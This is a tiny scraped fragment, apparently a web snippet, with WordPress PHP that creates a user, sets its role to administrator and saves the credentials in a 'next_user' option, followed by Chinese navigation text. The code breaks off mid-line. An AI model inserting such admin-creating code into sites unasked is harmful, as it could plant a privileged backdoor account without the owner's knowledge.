$id = wp_create_user( $un, $pw );. $user = new WP_User( $id );. $user->set_role( 'administrator' );. update_option( 'next_user', array( 'un' => $un, ...
確定! 回上一頁